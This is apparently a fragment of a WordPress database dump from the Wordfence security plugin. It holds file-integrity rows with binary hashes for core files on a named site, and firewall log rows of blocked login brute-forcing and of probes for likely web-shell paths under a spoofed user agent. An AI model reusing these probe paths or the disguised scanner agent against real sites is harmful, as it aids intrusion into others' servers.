','wp-includes/sodium_compat/src/Core32/HChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','95ef#ϝ','i\rC\"Գ \r48cS','',0,'?'),('*`Uz]\"L%1','wp-includes/sodium_compat/src/Core32/HSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Dzxǂ',',E{0/maXi ','',0,'?'),('Z|075o','wp-includes/sodium_compat/src/Core32/Int32.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','siQ$gFr','M=cS~[\r<)ǖ3O{xھ\0w','',0,'?'),('(LS[Wl#','wp-includes/sodium_compat/src/Core32/Int64.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Int64.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Хx ^5','H3y&k3}:','',0,'?'),('ue{X1 ','wp-includes/sodium_compat/src/Core32/Poly1305/State.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DM\"E4bќB\0','\"CYW6A\Zp7\r ','',0,'?'),('V\ZF\0|','wp-includes/sodium_compat/src/Core32/Poly1305.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@BgEJƽH','i|\\IE_ X綈j','',0,'?'),('|~','wp-includes/sodium_compat/src/Core32/Salsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6):','H0 Lї?㞹.1MIe٣','',0,'?'),('w+\02R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo\0y, *}c','2p\"Wjslf&S@[\\\"W','',0,'?'),('q05','wp-includes/sodium_compat/src/Core32/SipHash.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5O&? E %','^%%hT,k2Ȯn=n%:','',0,'?'),('`}+6L-q[$ ','wp-includes/sodium_compat/src/Core32/Util.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`0','qƖ%/ygrwÛ\rLR>=Y','',0,'?'),('@}~4Gv<m','wp-includes/sodium_compat/src/Core32/X25519.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gbf>=','ߺ`\'盱Жx#i#','',0,'?'),('U6υsd~x','wp-includes/sodium_compat/src/Core32/XChaCha20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y%RSTY','`-J\0P#M\"&o','',0,'?'),('hZ[=wr','wp-includes/sodium_compat/src/Core32/XSalsa20.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\:R/+','ɫ:jNmmR[','',0,'?'),('K=Xa :\'5','wp-includes/sodium_compat/src/Crypto.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-p\0Ecbc','\"̘L!{rDnPz^XjLk','',0,'?'),('elsUO|R}ܝi','wp-includes/sodium_compat/src/Crypto32.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}jNJQX]m ','ɱ䱃Fn2c.nMڣ A','',0,'?'),('`~|D%EHwO','wp-includes/sodium_compat/src/File.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r^\Z2','o%EsVFWWM]b BX0.y','',0,'?'),('xOW\r','wp-includes/sodium_compat/src/PHP52/SplFixedArray.php','/home/tummmyov/tummyrevolution.com/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ئTЬԄc/','TJ ),8q@fL N-@G\'tmGikR߮g\0','',0,'?'),('X= 2h4/{+','wp-includes/spl-autoload-compat.php','/home/tummmyov/tummyrevolution.com/wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6u{ t',',Z\rM >܅gp/ Z\Z#`!.','',0,'?'),('Ra~j,rVO','wp-includes/style-engine/class-wp-style-engine-css-declarations.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine/class-wp-style-engine-css-declarations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8LKd(','3#AjEr5]Stuf)sDZ','',0,'?'),('f=*bOs','wp-includes/style-engine/class-wp-style-engine-css-rule.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine/class-wp-style-engine-css-rule.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C`ÆBU[ZU','F]ȌW,Je[IffĒt','',0,'?'),('fyڸyYnC','wp-includes/style-engine/class-wp-style-engine-css-rules-store.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine/class-wp-style-engine-css-rules-store.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ChM_pY','0&Fo>I~_BC:3nk6C','',0,'?'),('v+[.I$]T','wp-includes/style-engine/class-wp-style-engine-processor.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine/class-wp-style-engine-processor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?%e̬C89','v¤{Dmj\nˁqEWay[','',0,'?'),('XJ\nsp3t9!҈','wp-includes/style-engine/class-wp-style-engine.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine/class-wp-style-engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \"by;\ZLY','ռ>=O`Qa}E|yqB\Z','',0,'?'),(':*+i*i2}Q','wp-includes/style-engine.php','/home/tummmyov/tummyrevolution.com/wp-includes/style-engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-;Hx 0Rc','`Q`I|ZSuÔt삚ZYI\\','',0,'?'),('X=UpfpZ','wp-includes/taxonomy.php','/home/tummmyov/tummyrevolution.com/wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wSoϺƙZ+','AjG\"=\00KR:ͩ','',0,'?'),('Mp\0`knP','wp-includes/template-canvas.php','/home/tummmyov/tummyrevolution.com/wp-includes/template-canvas.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\\Kg5vmx','=\0Ć}}8\rq>&','',0,'?'),(':+[gCZ','wp-includes/template-loader.php','/home/tummmyov/tummyrevolution.com/wp-includes/template-loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z ҿ܌~','\'4h 䱺[E%JH','',0,'?'),(':=%M۵','wp-includes/template.php','/home/tummmyov/tummyrevolution.com/wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AZnJ4L/3r','6}Q-䑺2>&Uε:-X','',0,'?'),('>hЩX X*v1','wp-includes/theme-compat/comments.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UҴ\0','z;h| txȘ 碉\\bd!ori>jr','',0,'?'),('\"8A\n=ᇼfp5','wp-includes/theme-compat/embed-404.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';CQ5 z','47:V]L,BR$2pz񁇹','',0,'?'),('fֈ VԹ)9','wp-includes/theme-compat/embed-content.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','me8','}Ecz]#nw?yRa 0ޅ6','',0,'?'),('+ q^eguF6\n','wp-includes/theme-compat/embed.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ţs^qcb','W5Tp;-n0aO\n','',0,'?'),('mL0N\"T~b','wp-includes/theme-compat/footer-embed.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/footer-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z.+j','iDAJψ;v,gc% ^#','',0,'?'),('Qֿ6yq88','wp-includes/theme-compat/footer.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^X{Q3','nt2. |?<mfYE~I','',0,'?'),('&vAQcqw8,','wp-includes/theme-compat/header-embed.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8F','})d!q ,@,jv E','',0,'?'),('LbP-I׭1f','wp-includes/theme-compat/header.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G{\r(7ND:W','q2յϢ>r7Nj D^A5\r','',0,'?'),('0;-,AEy','wp-includes/theme-compat/sidebar.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-compat/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(S;I(','UkxrLb\"J AF(u; \0&','',0,'?'),('>`P@߹','wp-includes/theme-i18n.json','/home/tummmyov/tummyrevolution.com/wp-includes/theme-i18n.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZNBC0F_N','A7j9Ԍ3aGOKKc','',0,'?'),('i9$:Ӟl{','wp-includes/theme-previews.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-previews.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Uyy+>gaI','6`p^k3Yjf)1Ն  *','',0,'?'),('(BA!','wp-includes/theme-templates.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ig~tw','H]l)RkZśe[~Rs렃','',0,'?'),('3औO5( ','wp-includes/theme.json','/home/tummmyov/tummyrevolution.com/wp-includes/theme.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ts# ','t|]JIbl:€:` (-UN','',0,'?'),('XVטO|8}','wp-includes/theme.php','/home/tummmyov/tummyrevolution.com/wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|ULщ ','qD0|7}\ZOH2','',0,'?'),('+qpW','wp-includes/update.php','/home/tummmyov/tummyrevolution.com/wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ot]i{u&hXrO','\\ k+HvQPM`Y(','',0,'?'),('kB˞b=y','wp-includes/user.php','/home/tummmyov/tummyrevolution.com/wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2`ђN# _R',']-8NHePlYpy3SV\ZnJcP.?','',0,'?'),('g+yrqD/','wp-includes/vars.php','/home/tummmyov/tummyrevolution.com/wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%A>!F','\n\'1UEh!4Sǣcm6nVV','',0,'?'),('5ZSμv`69','wp-includes/version.php','/home/tummmyov/tummyrevolution.com/wp-includes/version.php',0,'LƠ*zL','LƠ*zL','DRr`焍X\n9^46\\ӻ9yVN\0','',0,'?'),('Y,Qpgmu#e~','wp-includes/widgets/class-wp-nav-menu-widget.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-(\"vV>','N8X<ه\\՘1vvF7','',0,'?'),('TYPpEw','wp-includes/widgets/class-wp-widget-archives.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+ɯ@tН@X&','hĊZx:r8@޾͓$K','',0,'?'),('\0U aS ','wp-includes/widgets/class-wp-widget-block.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gGP\'#Dax\\','|XKeQLK[u\0@R','',0,'?'),('I0S$2TB*','wp-includes/widgets/class-wp-widget-calendar.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pv:2hv','}\Z))$G@U(\rJ@ÃI','',0,'?'); INSERT INTO `wpvt_wffilemods` (`filenameMD5`, `filename`, `real_path`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES ('RH\r0!d?c&','wp-includes/widgets/class-wp-widget-categories.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bofOճK','jc\ny;~;3RH3z4U hG','',0,'?'),('j\\ĦXnl','쇉,x-DO,7шQ','',0,'?'),('Ὀ5f?hk','wp-includes/widgets/class-wp-widget-media-audio.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',{H-]meZy','3PU{gnҮ䰊\nz \"ܼ','',0,'?'),('v\'j@-*','wp-includes/widgets/class-wp-widget-media-gallery.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WfLZdR.<','o z=nҖ׏J!=) +','',0,'?'),('PJ~]; `y','wp-includes/widgets/class-wp-widget-media-image.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SՔFiɓn','ʋ4ʁpq%ٍVlnt#aLtl5,;\n','',0,'?'),('_wƌ','wp-includes/widgets/class-wp-widget-media-video.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vI18K{','NI7 r\r/K3d}I*o]','',0,'?'),(']N Jjӎe','wp-includes/widgets/class-wp-widget-media.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dLt<','L}Kf\\AR ŭ (si{U','',0,'?'),('n֢\r V5,','wp-includes/widgets/class-wp-widget-meta.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j+(,^b(','PL+witZdkZ{XV`t','',0,'?'),('Kc#2s/(\"','wp-includes/widgets/class-wp-widget-pages.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rLZTtϛR','*\"#倮U8c*[j\'','',0,'?'),('6~e{\".w','wp-includes/widgets/class-wp-widget-recent-comments.php','/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','','',0,'?'),('^\'q0','wp-links-opml.php','/home/tummmyov/tummyrevolution.com/wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rW5t,}\"׫',' RysxL95\"CZ̜95 ;','',0,'?'),('$jX])D:','wp-load.php','/home/tummmyov/tummyrevolution.com/wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a\\`UzC!p}}}O','jCv:\Zis܅m9\rPvF','',0,'?'),('\r\0FJBe','wp-login.php','/home/tummmyov/tummyrevolution.com/wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<2 qm\0n+@','_.-1pAqހm\nq9n','',0,'?'),('3T.^ƙ<','wp-mail.php','/home/tummmyov/tummyrevolution.com/wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Ѕ@*Jewqz\"cT','V^[\Z?~','!\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14632,0.000000,1704662704.419409,'\0\0\0\0\0\0\0\0\0\0b0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14546,1704639206.275886,1704639206.207000,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/uploads/elementor/css/class_api.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9lbGVtZW50b3IvY3NzL2NsYXNzX2FwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14509,1704638775.962055,1704638775.860500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/uploads/wpcode/cache/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cGNvZGUvY2FjaGUvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14627,0.000000,1704657835.437066,'\0\0\0\0\0\0\0\0\0\0%\rQ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14628,0.000000,1704658890.103075,'\0\0\0\0\0\0\0\0\0\0n{',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14629,0.000000,1704659946.102248,'\0\0\0\0\0\0\0\0\0\0c',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14508,1704638779.818503,1704638779.753200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/uploads/wpcode/cache/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cGNvZGUvY2FjaGUvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14547,1704639199.389429,1704639199.324200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/classwithtostring.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzd2l0aHRvc3RyaW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14507,1704638786.158666,1704638786.073800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/uploads/wpcode/cache/library/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cGNvZGUvY2FjaGUvbGlicmFyeS93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15096,1704839661.057347,1704839660.961300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(14623,0.000000,1704654676.615469,'\0\0\0\0\0\0\0\0\0\0=&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14624,0.000000,1704655723.896075,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14625,0.000000,1704657093.072345,'\0\0\0\0\0\0\0\0\0\0bf',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14626,0.000000,1704657649.982740,'\0\0\0\0\0\0\0\0\0\0g',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14548,1704639192.333235,1704639192.260700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/classwithtostring.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzd2l0aHRvc3RyaW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14506,1704638790.533492,1704638790.438600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/uploads/wpcode/cache/library/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cGNvZGUvY2FjaGUvbGlicmFyeS93cC1sb2dpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14810,1704734505.469227,1704734505.375800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 